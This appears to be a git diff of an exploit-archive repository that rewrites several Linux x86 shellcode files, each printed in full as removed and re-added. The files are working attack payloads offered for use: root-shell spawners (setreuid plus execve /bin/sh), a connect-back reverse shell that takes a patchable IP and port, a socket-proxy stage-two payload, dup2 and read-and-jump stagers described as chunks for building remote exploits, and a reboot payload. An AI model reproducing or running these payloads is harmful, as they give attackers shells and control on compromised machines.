pop %ebx - "\x52" // push %edx - "\x68\x2f\x65\x78\x65" // push $0x6578652f - "\x53" // push %ebx - "\x68\x72\x6f\x63\x2f" // push $0x2f636f72 - "\x68\x2f\x2f\x2f\x70" // push $0x702f2f2f - "\xb0\x0b" // mov $0xb,%al - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) getppid() + execve("/proc//exe", ["/proc//exe", NULL]) - 51 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x40" // push $0x40 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + + // + // <_convert>: + // + + "\x4c" // dec %esp + "\x99" // cltd + "\x6a\x0a" // push $0xa + "\x5b" // pop %ebx + "\xf7\xf3" // div %ebx + "\x80\xc2\x30" // add $0x30,%dl + "\x88\x14\x24" // mov %dl,(%esp) + "\x85\xc0" // test %eax,%eax + "\x75\xef" // jnz _convert + "\x99" // cltd + "\x5b" // pop %ebx + "\x52" // push %edx + "\x68\x2f\x65\x78\x65" // push $0x6578652f + "\x53" // push %ebx + "\x68\x72\x6f\x63\x2f" // push $0x2f636f72 + "\x68\x2f\x2f\x2f\x70" // push $0x702f2f2f + "\xb0\x0b" // mov $0xb,%al + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13396.c b/platforms/lin_x86/shellcode/13396.c index 246dfaff9..468d66175 100755 --- a/platforms/lin_x86/shellcode/13396.c +++ b/platforms/lin_x86/shellcode/13396.c @@ -1,17 +1,17 @@ -/* - * (linux/x86) quick (yet conditional, eax != 0 and edx == 0) exit - 4 bytes - * - izik - */ - -char shellcode[] = - - "\xf7\xf0" // div %eax - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) quick (yet conditional, eax != 0 and edx == 0) exit - 4 bytes + * - izik + */ + +char shellcode[] = + + "\xf7\xf0" // div %eax + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13397.c b/platforms/lin_x86/shellcode/13397.c index ee43f4908..5a15e8b71 100755 --- a/platforms/lin_x86/shellcode/13397.c +++ b/platforms/lin_x86/shellcode/13397.c @@ -1,21 +1,21 @@ -/* - * (linux/x86) reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART) - 20 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x58" // push $0x58 - "\x58" // pop %eax - "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx - "\xb9\x69\x19\x12\x28" // mov $0x28121969,%ecx - "\xba\x67\x45\x23\x01" // mov $0x1234567,%edx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART) - 20 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x58" // push $0x58 + "\x58" // pop %eax + "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx + "\xb9\x69\x19\x12\x28" // mov $0x28121969,%ecx + "\xba\x67\x45\x23\x01" // mov $0x1234567,%edx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13398.c b/platforms/lin_x86/shellcode/13398.c index c451e4822..463602eda 100755 --- a/platforms/lin_x86/shellcode/13398.c +++ b/platforms/lin_x86/shellcode/13398.c @@ -1,30 +1,30 @@ -/* - * (linux/x86) setreuid(0, 0) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 31 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x46" // push $0x46 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx,%ebx - "\x31\xc9" // xor %ecx,%ecx - "\xcd\x80" // int $0x80 - "\x99" // cltd - "\xb0\x0b" // mov $0xb,%al - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) setreuid(0, 0) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 31 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x46" // push $0x46 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx,%ebx + "\x31\xc9" // xor %ecx,%ecx + "\xcd\x80" // int $0x80 + "\x99" // cltd + "\xb0\x0b" // mov $0xb,%al + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13399.c b/platforms/lin_x86/shellcode/13399.c index f941d0f19..a91e92fc5 100755 --- a/platforms/lin_x86/shellcode/13399.c +++ b/platforms/lin_x86/shellcode/13399.c @@ -1,26 +1,26 @@ -/* - * (linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) / PUSH - 23 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) / PUSH - 23 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13400.c b/platforms/lin_x86/shellcode/13400.c index af8eca2c1..f86ae3301 100755 --- a/platforms/lin_x86/shellcode/13400.c +++ b/platforms/lin_x86/shellcode/13400.c @@ -1,65 +1,65 @@ -/* - * (linux/x86) cat /dev/urandom > /dev/console, no real profit just for kicks - 63 bytes - * - izik - */ - -char shellcode[] = - - "\x31\xc9" // xor %ecx,%ecx - "\x51" // push %ecx - "\x68\x6e\x64\x6f\x6d" // push $0x6d6f646e - "\x68\x2f\x75\x72\x61" // push $0x6172752f - "\x68\x2f\x64\x65\x76" // push $0x7665642f - "\x89\xe3" // mov %esp,%ebx - "\xb1\x02" // mov $0x2,%cl - - // - // <_openit>: - // - - "\x6a\x05" // push $0x5 - "\x58" // pop %eax - "\x99" // cltd - "\xcd\x80" // int $0x80 - "\x96" // xchg %eax,%esi - "\x5f" // pop %edi - "\x5d" // pop %ebp - "\x5d" // pop %ebp - "\x68\x73\x6f\x6c\x65" // push $0x656c6f73 - "\x68\x2f\x63\x6f\x6e" // push $0x6e6f632f - "\x57" // push %edi - "\xe2\xe9" // loop <_openit> - - "\x89\xc3" // mov %eax,%ebx - - // - // <_makeio>: - // - - "\xb2\x04" // mov $0x4,%dl - "\x89\xe1" // mov %esp,%ecx - - // - // <_pre_ioloop>: - // - - "\xb0\x03" // mov $0x3,%al - "\xf8" // clc - - // - // <_ioloop>: - // - - "\xcd\x80" // int $0x80 - "\x87\xde" // xchg %ebx,%esi - "\x72\xf7" // jc <_pre_ioloop> - "\xf9" // stc - "\xeb\xf7"; // jmp <_ioloop> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) cat /dev/urandom > /dev/console, no real profit just for kicks - 63 bytes + * - izik + */ + +char shellcode[] = + + "\x31\xc9" // xor %ecx,%ecx + "\x51" // push %ecx + "\x68\x6e\x64\x6f\x6d" // push $0x6d6f646e + "\x68\x2f\x75\x72\x61" // push $0x6172752f + "\x68\x2f\x64\x65\x76" // push $0x7665642f + "\x89\xe3" // mov %esp,%ebx + "\xb1\x02" // mov $0x2,%cl + + // + // <_openit>: + // + + "\x6a\x05" // push $0x5 + "\x58" // pop %eax + "\x99" // cltd + "\xcd\x80" // int $0x80 + "\x96" // xchg %eax,%esi + "\x5f" // pop %edi + "\x5d" // pop %ebp + "\x5d" // pop %ebp + "\x68\x73\x6f\x6c\x65" // push $0x656c6f73 + "\x68\x2f\x63\x6f\x6e" // push $0x6e6f632f + "\x57" // push %edi + "\xe2\xe9" // loop <_openit> + + "\x89\xc3" // mov %eax,%ebx + + // + // <_makeio>: + // + + "\xb2\x04" // mov $0x4,%dl + "\x89\xe1" // mov %esp,%ecx + + // + // <_pre_ioloop>: + // + + "\xb0\x03" // mov $0x3,%al + "\xf8" // clc + + // + // <_ioloop>: + // + + "\xcd\x80" // int $0x80 + "\x87\xde" // xchg %ebx,%esi + "\x72\xf7" // jc <_pre_ioloop> + "\xf9" // stc + "\xeb\xf7"; // jmp <_ioloop> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13401.c b/platforms/lin_x86/shellcode/13401.c index 564fac004..539c6446c 100755 --- a/platforms/lin_x86/shellcode/13401.c +++ b/platforms/lin_x86/shellcode/13401.c @@ -1,51 +1,51 @@ -/*---------------------------------------------------------------------------* - * 90 byte Connect Back shellcode * - * by Russell Sanford - xort@tty64.org * - *---------------------------------------------------------------------------* - * filename: x86-linux-connect-back.c * - * info: Compiled with DTP Project. * - * discription: This is a x86-linux connect back shellcode. Just invoke * - * the function patchcode() before using shellcode. The format * - * for invoking patchcode is as follows: * - * * - * patchcode(shellcode,"11.22.33.44",31337); * - *---------------------------------------------------------------------------*/ - -char shellcode[] = -"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68" -" xor\x81\x04\x24t@tt\x68y64.\x81\x04\x24org \x6a\x10\x51\x50\x89\xe1\xb0\x66" -"\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0\x50" -"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b" -"\xcd\x80\xeb\xfe"; - -int find_safe_offset(int INT_A) { - - int INT_B=0; - - do { - INT_A -= 0x01010101; INT_B += 0x01010101; - } - while ( ((INT_A & 0x000000ff) == 0) || - ((INT_A & 0x0000ff00) == 0) || - ((INT_A & 0x00ff0000) == 0) || - ((INT_A & 0xff000000) == 0) ); - - return INT_B; -} - -void patchcode(char *shellcode, char *IP, int PORT) { - - int IP_A = inet_addr(IP); - int IP_B = find_safe_offset(IP_A); - - int PORT_A = ((ntohs(PORT) << 16) + 2); - int PORT_B = find_safe_offset(PORT_A); - - *(int *)&shellcode[19] = (IP_A - IP_B); - *(int *)&shellcode[26] = IP_B; - - *(int *)&shellcode[31] = (PORT_A - PORT_B); - *(int *)&shellcode[38] = PORT_B; -} - +/*---------------------------------------------------------------------------* + * 90 byte Connect Back shellcode * + * by Russell Sanford - xort@tty64.org * + *---------------------------------------------------------------------------* + * filename: x86-linux-connect-back.c * + * info: Compiled with DTP Project. * + * discription: This is a x86-linux connect back shellcode. Just invoke * + * the function patchcode() before using shellcode. The format * + * for invoking patchcode is as follows: * + * * + * patchcode(shellcode,"11.22.33.44",31337); * + *---------------------------------------------------------------------------*/ + +char shellcode[] = +"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68" +" xor\x81\x04\x24t@tt\x68y64.\x81\x04\x24org \x6a\x10\x51\x50\x89\xe1\xb0\x66" +"\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0\x50" +"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b" +"\xcd\x80\xeb\xfe"; + +int find_safe_offset(int INT_A) { + + int INT_B=0; + + do { + INT_A -= 0x01010101; INT_B += 0x01010101; + } + while ( ((INT_A & 0x000000ff) == 0) || + ((INT_A & 0x0000ff00) == 0) || + ((INT_A & 0x00ff0000) == 0) || + ((INT_A & 0xff000000) == 0) ); + + return INT_B; +} + +void patchcode(char *shellcode, char *IP, int PORT) { + + int IP_A = inet_addr(IP); + int IP_B = find_safe_offset(IP_A); + + int PORT_A = ((ntohs(PORT) << 16) + 2); + int PORT_B = find_safe_offset(PORT_A); + + *(int *)&shellcode[19] = (IP_A - IP_B); + *(int *)&shellcode[26] = IP_B; + + *(int *)&shellcode[31] = (PORT_A - PORT_B); + *(int *)&shellcode[38] = PORT_B; +} + // milw0rm.com [2005-12-28] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13402.c b/platforms/lin_x86/shellcode/13402.c index 3e594265a..fca3143e2 100755 --- a/platforms/lin_x86/shellcode/13402.c +++ b/platforms/lin_x86/shellcode/13402.c @@ -1,71 +1,71 @@ -/*---------------------------------------------------------------------------* - * 372 byte socket-proxy shellcode * - * by Russell Sanford - xort@tty64.org * - *---------------------------------------------------------------------------* - * filename: x86-linux-bounce-proxy.c * - * date: 12/23/2005 * - * info: Compiled with DTP Project. * - * discription: This is a x86-linux proxy shellcode. This is probably best * - * used in stage 2 situations. The syntax for invoking the * - * patchcode is as follows: * - * * - * patchcode(shellcode,31337,"11.22.33.44",80); * - * * - * Where 31337 is the port to listen to on the remote host * - *---------------------------------------------------------------------------*/ - -char shellcode[] = -"\xe8\xff\xff\xff\xff\xc6\x4e\x5e\x81\xc6\x18\xfc\xff\xff\xeb\x48\x89\xc3\x6a\x03\x59\xb0\xdd\xcd" -"\x80\x56\x89\xde\x80\xcc\x08\x6a\x04\x59\xb0\xdd\xcd\x80\x93\x5e\xc3\x89\xc2\x83\xe0\x1f\xc1\xea" -"\x05\x8d\x8e\x78\xff\xff\xff\x0f\xab\x04\x91\xc3\x93\xb0\x03\x8d\x8e\x48\xf4\xff\xff\x66\xba\x01" -"\x08\xcd\x80\xc3\x93\xb0\x04\x8d\x8e\x48\xf4\xff\xff\xcd\x80\xc3\x8d\xbe\xf8\xfe\xff\xff\x31\xc0" -"\x31\xc9\x66\xb9\x01\x01\xf3\xaa\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b" -"\x5a\x68\x7e\xff\xfe\xff\x81\x04\x24\x01\x01\x01\x01\x68 xor\x81\x04\x24t@tt\x6a\x10\x51\x50\x89" -"\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5a\x50\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89" -"\x46\xfc\xe8\x5b\xff\xff\xff\xe8\x6f\xff\xff\xff\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0" -"\x66\xcd\x80\x5b\x43\x5f\x68y64.\x81\x04\x24org \x68need\x81\x04\x24 job\x6a\x10\x51\x50\x89\xe1" -"\xb0\x66\xcd\x80\x58\x89\x46\xf8\xe8\x19\xff\xff\xff\xe8\x2d\xff\xff\xff\x8b\x5e\xfc\x8b\x4e\xf8" -"\x6a\x01\x53\x51\x6a\x02\x51\x53\x39\xd9\x7e\x02\x89\xcb\x56\x43\x8d\x8e\x78\xff\xff\xff\x31\xd2" -"\x31\xf6\x31\xff\xb0\x8e\xcd\x80\x5e\x58\x50\x89\xc2\x83\xe0\x1f\xc1\xea\x05\x8d\x8e\x78\xff\xff" -"\xff\x0f\xa3\x04\x91\x73\x04\x59\x59\xeb\x32\x58\x50\xe8\xe5\xfe\xff\xff\x58\x31\xff\x47\x83\x7c" -"\x24\x04\x02\x74\x02\xf7\xdf\x01\xf8\xe8\xe4\xfe\xff\xff\x39\xc0\x89\xc2\x58\x31\xff\x47\x83\x3c" -"\x24\x02\x75\x02\xf7\xdf\x01\xf8\xe8\xdd\xfe\xff\xff\x59\xe2\xb1\xeb\x88"; - -int find_safe_offset(int INT_A) { - - int INT_B=0; - - do { - INT_A -= 0x01010101; INT_B += 0x01010101; - } - while ( ((INT_A & 0x000000ff) == 0) || - ((INT_A & 0x0000ff00) == 0) || - ((INT_A & 0x00ff0000) == 0) || - ((INT_A & 0xff000000) == 0) ); - - return INT_B; -} - -void patchcode(char *shellcode, int PORT_IN, char *IP, int PORT_OUT) { - - int PORT_IN_A = ((ntohs(PORT_IN) << 16) + 2); - int PORT_IN_B = find_safe_offset(PORT_IN_A); - - int IP_A = inet_addr(IP); - int IP_B = find_safe_offset(IP_A); - - int PORT_OUT_A = ((ntohs(PORT_OUT) << 16) + 2); - int PORT_OUT_B = find_safe_offset(PORT_OUT_A); - - *(int *)&shellcode[134] = (PORT_IN_A - PORT_IN_B); - *(int *)&shellcode[141] = PORT_IN_B; - - *(int *)&shellcode[205] = (IP_A - IP_B); - *(int *)&shellcode[212] = IP_B; - - *(int *)&shellcode[217] = (PORT_OUT_A - PORT_OUT_B); - *(int *)&shellcode[224] = PORT_OUT_B; - -} - +/*---------------------------------------------------------------------------* + * 372 byte socket-proxy shellcode * + * by Russell Sanford - xort@tty64.org * + *---------------------------------------------------------------------------* + * filename: x86-linux-bounce-proxy.c * + * date: 12/23/2005 * + * info: Compiled with DTP Project. * + * discription: This is a x86-linux proxy shellcode. This is probably best * + * used in stage 2 situations. The syntax for invoking the * + * patchcode is as follows: * + * * + * patchcode(shellcode,31337,"11.22.33.44",80); * + * * + * Where 31337 is the port to listen to on the remote host * + *---------------------------------------------------------------------------*/ + +char shellcode[] = +"\xe8\xff\xff\xff\xff\xc6\x4e\x5e\x81\xc6\x18\xfc\xff\xff\xeb\x48\x89\xc3\x6a\x03\x59\xb0\xdd\xcd" +"\x80\x56\x89\xde\x80\xcc\x08\x6a\x04\x59\xb0\xdd\xcd\x80\x93\x5e\xc3\x89\xc2\x83\xe0\x1f\xc1\xea" +"\x05\x8d\x8e\x78\xff\xff\xff\x0f\xab\x04\x91\xc3\x93\xb0\x03\x8d\x8e\x48\xf4\xff\xff\x66\xba\x01" +"\x08\xcd\x80\xc3\x93\xb0\x04\x8d\x8e\x48\xf4\xff\xff\xcd\x80\xc3\x8d\xbe\xf8\xfe\xff\xff\x31\xc0" +"\x31\xc9\x66\xb9\x01\x01\xf3\xaa\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b" +"\x5a\x68\x7e\xff\xfe\xff\x81\x04\x24\x01\x01\x01\x01\x68 xor\x81\x04\x24t@tt\x6a\x10\x51\x50\x89" +"\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5a\x50\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89" +"\x46\xfc\xe8\x5b\xff\xff\xff\xe8\x6f\xff\xff\xff\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0" +"\x66\xcd\x80\x5b\x43\x5f\x68y64.\x81\x04\x24org \x68need\x81\x04\x24 job\x6a\x10\x51\x50\x89\xe1" +"\xb0\x66\xcd\x80\x58\x89\x46\xf8\xe8\x19\xff\xff\xff\xe8\x2d\xff\xff\xff\x8b\x5e\xfc\x8b\x4e\xf8" +"\x6a\x01\x53\x51\x6a\x02\x51\x53\x39\xd9\x7e\x02\x89\xcb\x56\x43\x8d\x8e\x78\xff\xff\xff\x31\xd2" +"\x31\xf6\x31\xff\xb0\x8e\xcd\x80\x5e\x58\x50\x89\xc2\x83\xe0\x1f\xc1\xea\x05\x8d\x8e\x78\xff\xff" +"\xff\x0f\xa3\x04\x91\x73\x04\x59\x59\xeb\x32\x58\x50\xe8\xe5\xfe\xff\xff\x58\x31\xff\x47\x83\x7c" +"\x24\x04\x02\x74\x02\xf7\xdf\x01\xf8\xe8\xe4\xfe\xff\xff\x39\xc0\x89\xc2\x58\x31\xff\x47\x83\x3c" +"\x24\x02\x75\x02\xf7\xdf\x01\xf8\xe8\xdd\xfe\xff\xff\x59\xe2\xb1\xeb\x88"; + +int find_safe_offset(int INT_A) { + + int INT_B=0; + + do { + INT_A -= 0x01010101; INT_B += 0x01010101; + } + while ( ((INT_A & 0x000000ff) == 0) || + ((INT_A & 0x0000ff00) == 0) || + ((INT_A & 0x00ff0000) == 0) || + ((INT_A & 0xff000000) == 0) ); + + return INT_B; +} + +void patchcode(char *shellcode, int PORT_IN, char *IP, int PORT_OUT) { + + int PORT_IN_A = ((ntohs(PORT_IN) << 16) + 2); + int PORT_IN_B = find_safe_offset(PORT_IN_A); + + int IP_A = inet_addr(IP); + int IP_B = find_safe_offset(IP_A); + + int PORT_OUT_A = ((ntohs(PORT_OUT) << 16) + 2); + int PORT_OUT_B = find_safe_offset(PORT_OUT_A); + + *(int *)&shellcode[134] = (PORT_IN_A - PORT_IN_B); + *(int *)&shellcode[141] = PORT_IN_B; + + *(int *)&shellcode[205] = (IP_A - IP_B); + *(int *)&shellcode[212] = IP_B; + + *(int *)&shellcode[217] = (PORT_OUT_A - PORT_OUT_B); + *(int *)&shellcode[224] = PORT_OUT_B; + +} + // milw0rm.com [2005-12-28] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13403.c b/platforms/lin_x86/shellcode/13403.c index 4d3b3e035..4e215c583 100755 --- a/platforms/lin_x86/shellcode/13403.c +++ b/platforms/lin_x86/shellcode/13403.c @@ -1,29 +1,29 @@ -/* dup2_loop-core.c by Charles Stevenson - * - * I made this as a chunk you can paste in to make modular remote - * exploits. I usually combine this with an execve as the second - * stage of a read() jmp *%esp - */ -char hellcode[] = /* dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core */ -"\x31\xc9" // xor %ecx,%ecx -"\x56" // push %esi -"\x5b" // pop %ebx -// loop: -"\x6a\x3f" // push $0x3f -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -"\x41" // inc %ecx -"\x80\xf9\x03" // cmp $0x3,%cl -"\x75\xf5" // jne 80483e8 -; - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* dup2_loop-core.c by Charles Stevenson + * + * I made this as a chunk you can paste in to make modular remote + * exploits. I usually combine this with an execve as the second + * stage of a read() jmp *%esp + */ +char hellcode[] = /* dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core */ +"\x31\xc9" // xor %ecx,%ecx +"\x56" // push %esi +"\x5b" // pop %ebx +// loop: +"\x6a\x3f" // push $0x3f +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +"\x41" // inc %ecx +"\x80\xf9\x03" // cmp $0x3,%cl +"\x75\xf5" // jne 80483e8 +; + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13404.c b/platforms/lin_x86/shellcode/13404.c index 81af107ab..90748d5b6 100755 --- a/platforms/lin_x86/shellcode/13404.c +++ b/platforms/lin_x86/shellcode/13404.c @@ -1,54 +1,54 @@ -/* h3ll-core.c by Charles Stevenson - * - * I made this as a chunk you can paste in to make modular remote - * exploits. I use it as a first stage payload when I desire to - * follow up with a real large payload of goodness. This actually - * is a bit larger than necessary because of the error checking but - * in some cases prooves nice. For a tiny version of the same theme - * check out mcb's 14 byte (saving of 15 bytes for all you - * mathematician's out there ;). The only problem might be that his - * reads from stdin and can only reads 385 bytes less than mine. So - * If you like to go big on the shellcode use mine... otherwise here's - * mcb's (or comment out the delimited lines below to shrink mine): - * - * "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4" - * - * I assume the file descriptor is in %esi. Since that's where it - * was on the last exploit I wrote. Change the instruction to - * the appropriate register from your fndsckcode or put an int in - * there for and fd that's always the same. - */ -char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */ -// uncomment the following line to raise SIGTRAP in gdb -// "\xcc" // int3 -// 22 bytes: -// if (read(fd,buf,512) <= 0x2) _exit(1) else buf(); -"\x31\xdb" // xor %ebx,%ebx -"\xf7\xe3" // mul %ebx -"\x42" // inc %edx -"\xc1\xe2\x09" // shl $0x9,%edx -"\x31\xf3" // xor %esi,%ebx // (optional assumes fd in esi) -"\x04\x03" // add $0x3,%al -"\x54" // push %esp -"\x59" // pop %ecx -"\xcd\x80" // int $0x80 -"\x3c\x02" // cmp $0x02,%al // (optional error check) -"\x7e\x02" // jle exit // (optional exit clean) -"\xff\xe1" // jmp *%ecx -// 7 bytes _exit(1) (optional _exit(1);) -"\x31\xc0" // xor %eax,%eax -"\x40" // inc %eax -"\x89\xc3" // mov %eax,%ebx -"\xcd\x80" // int $0x80 -; - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* h3ll-core.c by Charles Stevenson + * + * I made this as a chunk you can paste in to make modular remote + * exploits. I use it as a first stage payload when I desire to + * follow up with a real large payload of goodness. This actually + * is a bit larger than necessary because of the error checking but + * in some cases prooves nice. For a tiny version of the same theme + * check out mcb's 14 byte (saving of 15 bytes for all you + * mathematician's out there ;). The only problem might be that his + * reads from stdin and can only reads 385 bytes less than mine. So + * If you like to go big on the shellcode use mine... otherwise here's + * mcb's (or comment out the delimited lines below to shrink mine): + * + * "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4" + * + * I assume the file descriptor is in %esi. Since that's where it + * was on the last exploit I wrote. Change the instruction to + * the appropriate register from your fndsckcode or put an int in + * there for and fd that's always the same. + */ +char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */ +// uncomment the following line to raise SIGTRAP in gdb +// "\xcc" // int3 +// 22 bytes: +// if (read(fd,buf,512) <= 0x2) _exit(1) else buf(); +"\x31\xdb" // xor %ebx,%ebx +"\xf7\xe3" // mul %ebx +"\x42" // inc %edx +"\xc1\xe2\x09" // shl $0x9,%edx +"\x31\xf3" // xor %esi,%ebx // (optional assumes fd in esi) +"\x04\x03" // add $0x3,%al +"\x54" // push %esp +"\x59" // pop %ecx +"\xcd\x80" // int $0x80 +"\x3c\x02" // cmp $0x02,%al // (optional error check) +"\x7e\x02" // jle exit // (optional exit clean) +"\xff\xe1" // jmp *%ecx +// 7 bytes _exit(1) (optional _exit(1);) +"\x31\xc0" // xor %eax,%eax +"\x40" // inc %eax +"\x89\xc3" // mov %eax,%ebx +"\xcd\x80" // int $0x80 +; + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13405.c b/platforms/lin_x86/shellcode/13405.c index 2dc9e85dd..7ba63b455 100755 --- a/platforms/lin_x86/shellcode/13405.c +++ b/platforms/lin_x86/shellcode/13405.c @@ -1,23 +1,23 @@ -/* exit-core.c by Charles Stevenson - * - * I made this as a chunk you can paste in to make modular remote - * exploits. I use it when I need a process to exit cleanly. - */ -char hellcode[] = /* _exit(1); linux/x86 by core */ -// 7 bytes _exit(1) ... 'cause we're nice >:) by core -"\x31\xc0" // xor %eax,%eax -"\x40" // inc %eax -"\x89\xc3" // mov %eax,%ebx -"\xcd\x80" // int $0x80 -; - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte _exit(1); 